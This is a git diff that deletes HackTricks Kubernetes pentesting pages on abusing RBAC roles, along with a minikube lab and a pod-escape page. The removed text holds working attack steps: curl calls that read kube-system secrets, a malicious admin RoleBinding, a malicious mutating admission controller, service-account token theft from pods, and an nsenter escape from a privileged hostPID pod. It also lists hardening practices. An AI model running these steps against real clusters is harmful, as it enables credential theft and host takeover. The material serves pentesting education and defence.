\_list secrets**\_ in the cluster can use the following _curl_ commands to get all secrets in β€œkube-system” namespace: - -```bash -curl -v -H "Authorization: Bearer " https://:/api/v1/namespaces/kube-system/secrets/ -``` - -![](https://www.cyberark.com/wp-content/uploads/2019/08/Kube-Pentest-Fig-2.png) - -### **Reading a secret – brute-forcing token IDs** - -An attacker that found a token with permission to read a secret can’t use this permission without knowing the full secret’s name. This permission is different from the _**listing** **secrets**_ permission described above. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/getting\_secret\_clusterRole.png) - -![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRoleBinding\_with\_get\_secrets\_clusterRole.png) - -Although the attacker doesn’t know the secret’s name, there are default service accounts that can be enlisted. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/default\_service\_accounts\_list.png) - -Each service account has an associated secret with a static (non-changing) prefix and a postfix of a random five-character string token at the end. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/default\_service\_account\_on\_kube\_system\_namespace-1024x556.png) - -The random token structure is 5-character string built from alphanumeric (lower letters and digits) characters. **But it doesn’t contain all the letters and digits.** - -When looking inside the [source code](https://github.com/kubernetes/kubernetes/blob/8418cccaf6a7307479f1dfeafb0d2823c1c37802/staging/src/k8s.io/apimachinery/pkg/util/rand/rand.go#L83), it appears that the token is generated from only 27 characters β€œbcdfghjklmnpqrstvwxz2456789” and not 36 (a-z and 0-9) - -![](https://www.cyberark.com/wp-content/uploads/2018/12/character\_set\_from\_rand\_go.png) - -![](https://www.cyberark.com/wp-content/uploads/2018/12/comments\_on\_removing\_characters\_rand\_go\_character\_set-1024x138.png) - -This means that there are 275 = 14,348,907 possibilities for a token. - -An attacker can run a brute-force attack to guess the token ID in couple of hours. Succeeding to get secrets from default sensitive service accounts will allow him to escalate privileges. - -## Built-in Privileged Escalation Prevention - -Although there can be risky permissions, Kubernetes is doing good work preventing other types of permissions with potential for privileged escalation. - -Kubernetes has a [built-in mechanism](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#privilege-escalation-prevention-and-bootstrapping) for that: - -β€œThe RBAC API **prevents users from escalating privileges** by editing roles or role bindings. Because this is enforced at the API level, it applies even when the RBAC authorizer is not in use. - -A user can only **create/update a role if they already have all the permissions contained in the role**, at the same scope as the role (cluster-wide for a ClusterRole, within the same namespace or cluster-wide for a Role)” - -Let’s see an example for such prevention. - -A service account named _sa7_ is in a RoleBinding _edit-role-rolebinding_. This RoleBinding object has a role named _edit-role_ that has **full permissions rules** on roles. Theoretically, it means that the service account can **edit** **any role** in the _default_ namespace. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/edit\_roles\_roleBinding\_binding\_sa7\_to\_edit\_role.png) - -![](https://www.cyberark.com/wp-content/uploads/2018/12/role\_to\_edit\_any\_role.png) - -There is also an existing role named _list-pods_. Anyone with this role can list all the pods on the _default_ namespace. The user _sa7_ should have permissions to edit any roles, so let’s see what happens when it tries to add the β€œsecrets” resource to the role’s resources. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/edit\_role\_resources-300x66.png) - -After trying to do so, we will receive an error β€œforbidden: attempt to grant extra privileges” (Figure 31), because although our _sa7_ user has permissions to update roles for any resource, it can update the role only for resources that it has permissions over. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/forbidden\_attempt\_to\_gran\_extra\_privileges\_message-1024x288.png) - -### **Get & Patch RoleBindings/ClusterRoleBindings** - -{% hint style="danger" %} -**Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. Yo cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't have already.** -{% endhint %} - -The privilege to create Rolebindings allows a user to **bind roles to a service account**. This privilege can potentially lead to privilege escalation because it **allows the user to bind admin privileges to a compromised service account.** - -The following ClusterRole is using the special verb _bind_ that allows a user to create a RoleBinding with _admin_ ClusterRole (default high privileged role) and to add any user, including itself, to this admin ClusterRole. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole\_with\_bind\_verb.png) - -Then it's possible to create **`malicious-RoleBinging.json`**, which **binds the admin role to other compromised service account:** - -```javascript -{ - "apiVersion": "rbac.authorization.k8s.io/v1", - "kind": "RoleBinding", - "metadata": { - "name": "malicious-rolebinding", - "namespaces": "default" - }, - "roleRef": { - "apiGroup": "*", - "kind": "ClusterRole", - "name": "admin" - }, - "subjects": [ - { - "kind": "ServiceAccount", - "name": "compromised-svc" - "namespace": "default" - } - ] -} -``` - -The purpose of this JSON file is to bind the admin β€œCluserRole” (line 11) to the compromised service account (line 16). - -Now, all we need to do is to send our JSON as a POST request to the API using the following CURL command: - -```bash -curl -k -v -X POST -H "Authorization: Bearer " \ --H "Content-Type: application/json" \ -https://:/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings \ - -d @malicious-RoleBinging.json -``` - -After the **admin role is bound to the β€œcompromised-svc” service account**, we can use the compromised service account token to **list secrets**. The following CURL command will do this: - -```bash -curl -k -v -X POST -H "Authorization: Bearer "\ --H "Content-Type: application/json" -https://:/api/v1/namespaces/kube-system/secret -``` - -## Other Attacks - -### S**idecar proxy app** - -By default there isn't any encryption in the communication between pods .Mutual authentication, two-way, pod to pod. - -#### Create a sidecar proxy app - -Create your .yaml - -```bash -kubectl run app --image=bash --command -oyaml --dry-run=client > -- sh -c 'ping google.com' -``` - -Edit your .yaml and add the uncomment lines: - -```yaml -#apiVersion: v1 -#kind: Pod -#metadata: -# name: security-context-demo -#spec: -# securityContext: -# runAsUser: 1000 -# runAsGroup: 3000 -# fsGroup: 2000 -# volumes: -# - name: sec-ctx-vol -# emptyDir: {} -# containers: -# - name: sec-ctx-demo -# image: busybox - command: [ "sh", "-c", "apt update && apt install iptables -y && iptables -L && sleep 1h" ] - securityContext: - capabilities: - add: ["NET_ADMIN"] - # volumeMounts: - # - name: sec-ctx-vol - # mountPath: /data/demo - # securityContext: - # allowPrivilegeEscalation: true -``` - -See the logs of the proxy: - -```bash -kubectl logs app -C proxy -``` - -More info at: [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) - -### Malicious Admission Controller - -An admission controller is a piece of code that **intercepts requests to the Kubernetes API server** before the persistence of the object, but **after the request is authenticated** **and authorized**. - -![](<../../../.gitbook/assets/image (651) (1) (1) (1) (1) (1).png>) - -If an attacker somehow manages to **inject a Mutationg Adminssion Controller**, he will be able to **modify already authenticated requests**. Being able to potentially privesc, and more usually persist in the cluster. - -Example from [https://blog.rewanthtammana.com/creating-malicious-admission-controllers](https://blog.rewanthtammana.com/creating-malicious-admission-controllers): - -```bash -git clone https://github.com/rewanthtammana/malicious-admission-controller-webhook-demo -cd malicious-admission-controller-webhook-demo -./deploy.sh -kubectl get po -n webhook-demo -w -``` - -Wait until the webhook server is ready. Check the status: - -```bash -kubectl get mutatingwebhookconfigurations -kubectl get deploy,svc -n webhook-demo -``` - -![mutating-webhook-status-check.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433436353/yHUvUWugR.png?auto=compress,format\&format=webp) - -Once we have our malicious mutating webhook running, let's deploy a new pod. - -```bash -kubectl run nginx --image nginx -kubectl get po -w -``` - -Wait again, until you see the change in pod status. Now, you can see `ErrImagePull` error. Check the image name with either of the queries. - -```bash -kubectl get po nginx -o=jsonpath='{.spec.containers[].image}{"\n"}' -kubectl describe po nginx | grep "Image: " -``` - -![malicious-admission-controller.PNG](https://cdn.hashnode.com/res/hashnode/image/upload/v1628433512073/leFXtgSzm.png?auto=compress,format\&format=webp) - -As you can see in the above image, we tried running image `nginx` but the final executed image is `rewanthtammana/malicious-image`. What just happened!!? - -#### Technicalities - -We will unfold what just happened. The `./deploy.sh` script that you executed, created a mutating webhook admission controller. The below lines in the mutating webhook admission controller are responsible for the above results. - -``` -patches = append(patches, patchOperation{ - Op: "replace", - Path: "/spec/containers/0/image", - Value: "rewanthtammana/malicious-image", -}) -``` - -The above snippet replaces the first container image in every pod with `rewanthtammana/malicious-image`. - -## Best Practices - -### **Prevent service account token automounting on pods** - -When a pod is being created, it automatically mounts a service account (the default is default service account in the same namespace). Not every pod needs the ability to utilize the API from within itself. - -From version 1.6+ it is possible to prevent automounting of service account tokens on pods using automountServiceAccountToken: false. It can be used on service accounts or pods. - -On a service account it should be added like this:\\ - -![](https://www.cyberark.com/wp-content/uploads/2018/12/serviceAccount\_with\_autoamountServiceAccountToken\_false.png) - -It is also possible to use it on the pod:\\ - -![](https://www.cyberark.com/wp-content/uploads/2018/12/pod\_with\_autoamountServiceAccountToken\_false.png) - -### **Grant specific users to RoleBindings\ClusterRoleBindings** - -When creating RoleBindings\ClusterRoleBindings, make sure that only the users that need the role in the binding are inside. It is easy to forget users that are not relevant anymore inside such groups. - -### **Use Roles and RoleBindings instead of ClusterRoles and ClusterRoleBindings** - -When using ClusterRoles and ClusterRoleBindings, it applies on the whole cluster. A user in such a group has its permissions over all the namespaces, which is sometimes unnecessary. Roles and RoleBindings can be applied on a specific namespace and provide another layer of security. - -### **Use automated tools** - -{% embed url="https://github.com/cyberark/KubiScan" %} - -{% embed url="https://github.com/aquasecurity/kube-hunter" %} - -{% embed url="https://github.com/aquasecurity/kube-bench" %} - -## **References** - -{% embed url="https://www.cyberark.com/resources/threat-research-blog/securing-kubernetes-clusters-by-eliminating-risky-permissions" %} - -{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-1" %} - -*** - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md deleted file mode 100644 index 49138fef1..000000000 --- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md +++ /dev/null @@ -1,645 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -You can run these labs just inside **minikube**. - -# Pod Creation -> Escalate to ns SAs - -We are going to create: - -* A **Service account "test-sa"** with a cluster privilege to **read secrets** - * A ClusterRole "test-cr" and a ClusterRoleBinding "test-crb" will be created -* **Permissions** to list and **create** pods to a user called "**Test**" will be given - * A Role "test-r" and RoleBinding "test-rb" will be created -* Then we will **confirm** that the SA can list secrets and that the user Test can list a pods -* Finally we will **impersonate the user Test** to **create a pod** that includes the **SA test-sa** and **steal** the service account **token.** - * This is the way yo show the user could escalate privileges this way - -{% hint style="info" %} -To create the scenario an admin account is used.\ -Moreover, to **exfiltrate the sa token** in this example the **admin account is used** to exec inside the created pod. However, [**as explained here**](./#pod-creation-steal-token), the **declaration of the pod could contain the exfiltration of the token**, so the "exec" privilege is not necesario to exfiltrate the token, the **"create" permission is enough**. -{% endhint %} - -```bash -# Create Service Account test-sa -# Create role and rolebinding to give list and create permissions over pods in default namespace to user Test -# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhere - -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r -rules: - - apiGroups: [""] - resources: ["pods"] - verbs: ["get", "list", "delete", "patch", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb -subjects: - - kind: ServiceAccount - name: test-sa - - kind: User - name: Test -roleRef: - kind: Role - name: test-r - apiGroup: rbac.authorization.k8s.io ---- -kind: ClusterRole -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-cr -rules: - - apiGroups: [""] - resources: ["secrets"] - verbs: ["get", "list", "delete", "patch", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: test-crb -subjects: - - kind: ServiceAccount - namespace: default - name: test-sa - apiGroup: "" -roleRef: - kind: ClusterRole - name: test-cr - apiGroup: rbac.authorization.k8s.io' | kubectl apply -f - - -# Check test-sa can access kube-system secrets -kubectl --as system:serviceaccount:default:test-sa -n kube-system get secrets - -# Check user User can get pods in namespace default -kubectl --as Test -n default get pods - -# Create a pod as user Test with the SA test-sa (privesc step) -echo "apiVersion: v1 -kind: Pod -metadata: - name: test-pod - namespace: default -spec: - containers: - - name: alpine - image: alpine - command: ['/bin/sh'] - args: ['-c', 'sleep 100000'] - serviceAccountName: test-sa - automountServiceAccountToken: true - hostNetwork: true"| kubectl --as Test apply -f - - -# Connect to the pod created an confirm the attached SA token belongs to test-sa -kubectl exec -ti -n default test-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d - -# Clean the scenario -kubectl delete pod test-pod -kubectl delete clusterrolebinding test-crb -kubectl delete clusterrole test-cr -kubectl delete rolebinding test-rb -kubectl delete role test-r -kubectl delete serviceaccount test-sa -``` - -# Create Daemonset - -```bash -# Create Service Account test-sa -# Create role and rolebinding to give list & create permissions over daemonsets in default namespace to user Test -# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhere - -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r -rules: - - apiGroups: ["apps"] - resources: ["daemonsets"] - verbs: ["get", "list", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb -subjects: - - kind: User - name: Test -roleRef: - kind: Role - name: test-r - apiGroup: rbac.authorization.k8s.io ---- -kind: ClusterRole -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-cr -rules: - - apiGroups: [""] - resources: ["secrets"] - verbs: ["get", "list", "delete", "patch", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: test-crb -subjects: - - kind: ServiceAccount - namespace: default - name: test-sa - apiGroup: "" -roleRef: - kind: ClusterRole - name: test-cr - apiGroup: rbac.authorization.k8s.io' | kubectl apply -f - - -# Check test-sa can access kube-system secrets -kubectl --as system:serviceaccount:default:test-sa -n kube-system get secrets - -# Check user User can get pods in namespace default -kubectl --as Test -n default get daemonsets - -# Create a daemonset as user Test with the SA test-sa (privesc step) -echo "apiVersion: apps/v1 -kind: DaemonSet -metadata: - name: alpine - namespace: default -spec: - selector: - matchLabels: - name: alpine - template: - metadata: - labels: - name: alpine - spec: - serviceAccountName: test-sa - automountServiceAccountToken: true - hostNetwork: true - containers: - - name: alpine - image: alpine - command: ['/bin/sh'] - args: ['-c', 'sleep 100000']"| kubectl --as Test apply -f - - -# Connect to the pod created an confirm the attached SA token belongs to test-sa -kubectl exec -ti -n default daemonset.apps/alpine -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d - -# Clean the scenario -kubectl delete daemonset alpine -kubectl delete clusterrolebinding test-crb -kubectl delete clusterrole test-cr -kubectl delete rolebinding test-rb -kubectl delete role test-r -kubectl delete serviceaccount test-sa -``` - -## Patch Daemonset - -In this case we are going to **patch a daemonset** to make its pod load our desired service account. - -If your user has the **verb update instead of patch, this won't work**. - -```bash -# Create Service Account test-sa -# Create role and rolebinding to give list & update patch permissions over daemonsets in default namespace to user Test -# Create clusterrole and clusterrolebinding to give the SA test-sa access to secrets everywhere - -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r -rules: - - apiGroups: ["apps"] - resources: ["daemonsets"] - verbs: ["get", "list", "patch"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb -subjects: - - kind: User - name: Test -roleRef: - kind: Role - name: test-r - apiGroup: rbac.authorization.k8s.io ---- -kind: ClusterRole -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-cr -rules: - - apiGroups: [""] - resources: ["secrets"] - verbs: ["get", "list", "delete", "patch", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: test-crb -subjects: - - kind: ServiceAccount - namespace: default - name: test-sa - apiGroup: "" -roleRef: - kind: ClusterRole - name: test-cr - apiGroup: rbac.authorization.k8s.io ---- -apiVersion: apps/v1 -kind: DaemonSet -metadata: - name: alpine - namespace: default -spec: - selector: - matchLabels: - name: alpine - template: - metadata: - labels: - name: alpine - spec: - automountServiceAccountToken: false - hostNetwork: true - containers: - - name: alpine - image: alpine - command: ['/bin/sh'] - args: ['-c', 'sleep 100']' | kubectl apply -f - - -# Check user User can get pods in namespace default -kubectl --as Test -n default get daemonsets - -# Create a daemonset as user Test with the SA test-sa (privesc step) -echo "apiVersion: apps/v1 -kind: DaemonSet -metadata: - name: alpine - namespace: default -spec: - selector: - matchLabels: - name: alpine - template: - metadata: - labels: - name: alpine - spec: - serviceAccountName: test-sa - automountServiceAccountToken: true - hostNetwork: true - containers: - - name: alpine - image: alpine - command: ['/bin/sh'] - args: ['-c', 'sleep 100000']"| kubectl --as Test apply -f - - -# Connect to the pod created an confirm the attached SA token belongs to test-sa -kubectl exec -ti -n default daemonset.apps/alpine -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d - -# Clean the scenario -kubectl delete daemonset alpine -kubectl delete clusterrolebinding test-crb -kubectl delete clusterrole test-cr -kubectl delete rolebinding test-rb -kubectl delete role test-r -kubectl delete serviceaccount test-sa -``` - -# Doesn't work - -## Create/Patch Bindings - -**Doesn't work:** - -* **Create a new RoleBinding** just with the verb **create** -* **Create a new RoleBinding** just with the verb **patch** (you need to have the binding permissions) - * You cannot do this to assign the role to yourself or to a different SA -* **Modify a new RoleBinding** just with the verb **patch** (you need to have the binding permissions) - * You cannot do this to assign the role to yourself or to a different SA - -```bash -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa2 ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r -rules: - - apiGroups: ["rbac.authorization.k8s.io"] - resources: ["rolebindings"] - verbs: ["get", "patch"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb -subjects: - - kind: User - name: Test -roleRef: - kind: Role - name: test-r - apiGroup: rbac.authorization.k8s.io ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r2 -rules: - - apiGroups: [""] - resources: ["pods"] - verbs: ["get", "list", "delete", "patch", "create"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb2 -subjects: - - kind: ServiceAccount - name: test-sa - apiGroup: "" -roleRef: - kind: Role - name: test-r2 - apiGroup: rbac.authorization.k8s.io' | kubectl apply -f - - -# Create a pod as user Test with the SA test-sa (privesc step) -echo "apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-r2 -subjects: - - kind: ServiceAccount - name: test-sa2 - apiGroup: "" -roleRef: - kind: Role - name: test-r2 - apiGroup: rbac.authorization.k8s.io"| kubectl --as Test apply -f - - -# Connect to the pod created an confirm the attached SA token belongs to test-sa -kubectl exec -ti -n default test-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token | cut -d "." -f2 | base64 -d - -# Clean the scenario -kubectl delete rolebinding test-rb -kubectl delete rolebinding test-rb2 -kubectl delete role test-r -kubectl delete role test-r2 -kubectl delete serviceaccount test-sa -kubectl delete serviceaccount test-sa2 -``` - -## Bind explicitly Bindings - -In the "Privilege Escalation Prevention and Bootstrapping" section of [https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/](https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/) it's mentioned that if a SA can create a Binding and has explicitly Bind permissions over the Role/Cluster role, it can create bindings even using Roles/ClusterRoles with permissions that it doesn't have.\ -However, it didn't work for me: - -```yaml -# Create 2 SAs, give one of them permissions to create clusterrolebindings -# and bind permissions over the ClusterRole "admin" -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa2 ---- -kind: ClusterRole -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-cr -rules: - - apiGroups: ["rbac.authorization.k8s.io"] - resources: ["clusterrolebindings"] - verbs: ["get", "create"] - - apiGroups: ["rbac.authorization.k8s.io/v1"] - resources: ["clusterroles"] - verbs: ["bind"] - resourceNames: ["admin"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: test-crb -subjects: - - kind: ServiceAccount - name: test-sa - namespace: default -roleRef: - kind: ClusterRole - name: test-cr - apiGroup: rbac.authorization.k8s.io -' | kubectl apply -f - - -# Try to bind the ClusterRole "admin" with the second SA (won't work) -echo 'apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRoleBinding -metadata: - name: test-crb2 -subjects: - - kind: ServiceAccount - name: test-sa2 - namespace: default -roleRef: - kind: ClusterRole - name: admin - apiGroup: rbac.authorization.k8s.io -' | kubectl --as system:serviceaccount:default:test-sa apply -f - - -# Clean environment -kubectl delete clusterrolebindings test-crb -kubectl delete clusterrolebindings test-crb2 -kubectl delete clusterrole test-cr -kubectl delete serviceaccount test-sa -kubectl delete serviceaccount test-sa -``` - -```yaml -# Like the previous example, but in this case we try to use RoleBindings -# instead of CLusterRoleBindings - -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa2 ---- -kind: ClusterRole -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-cr -rules: - - apiGroups: ["rbac.authorization.k8s.io"] - resources: ["clusterrolebindings"] - verbs: ["get", "create"] - - apiGroups: ["rbac.authorization.k8s.io"] - resources: ["rolebindings"] - verbs: ["get", "create"] - - apiGroups: ["rbac.authorization.k8s.io/v1"] - resources: ["clusterroles"] - verbs: ["bind"] - resourceNames: ["admin","edit","view"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb - namespace: default -subjects: - - kind: ServiceAccount - name: test-sa - namespace: default -roleRef: - kind: ClusterRole - name: test-cr - apiGroup: rbac.authorization.k8s.io -' | kubectl apply -f - - -# Won't work -echo 'apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb2 - namespace: default -subjects: - - kind: ServiceAccount - name: test-sa2 - namespace: default -roleRef: - kind: ClusterRole - name: admin - apiGroup: rbac.authorization.k8s.io -' | kubectl --as system:serviceaccount:default:test-sa apply -f - - -# Clean environment -kubectl delete rolebindings test-rb -kubectl delete rolebindings test-rb2 -kubectl delete clusterrole test-cr -kubectl delete serviceaccount test-sa -kubectl delete serviceaccount test-sa2 -``` - -## Arbitrary roles creation - -In this example we try to create a role having the permissions create and path over the roles resources. However, K8s prevent us from creating a role with more permissions the principal creating is has: - -```yaml -# Create a SA and give the permissions "create" and "patch" over "roles" -echo 'apiVersion: v1 -kind: ServiceAccount -metadata: - name: test-sa ---- -kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r -rules: - - apiGroups: ["rbac.authorization.k8s.io"] - resources: ["roles"] - verbs: ["patch", "create", "get"] ---- -apiVersion: rbac.authorization.k8s.io/v1 -kind: RoleBinding -metadata: - name: test-rb -subjects: - - kind: ServiceAccount - name: test-sa -roleRef: - kind: Role - name: test-r - apiGroup: rbac.authorization.k8s.io -' | kubectl apply -f - - -# Try to create a role over all the resources with "create" and "patch" -# This won't wotrk -echo 'kind: Role -apiVersion: rbac.authorization.k8s.io/v1 -metadata: - name: test-r2 -rules: - - apiGroups: [""] - resources: ["*"] - verbs: ["patch", "create"]' | kubectl --as system:serviceaccount:default:test-sa apply -f- - -# Clean the environment -kubectl delete rolebinding test-rb -kubectl delete role test-r -kubectl delete role test-r2 -kubectl delete serviceaccount test-sa -``` - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md deleted file mode 100644 index 811a033b1..000000000 --- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md +++ /dev/null @@ -1,74 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Privileged and hostPID - -With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\ -Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp). - -Just executing something like the following will allow you to escape from the pod: - -```bash -nsenter --target 1 --mount --uts --ipc --net --pid -- bash -``` - -Configuration example: - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: priv-and-hostpid-exec-pod - labels: - app: pentest -spec: - hostPID: true - containers: - - name: priv-and-hostpid-pod - image: ubuntu - tty: true - securityContext: - privileged: true - command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] - #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -``` - -# Privileged only - - - - - -
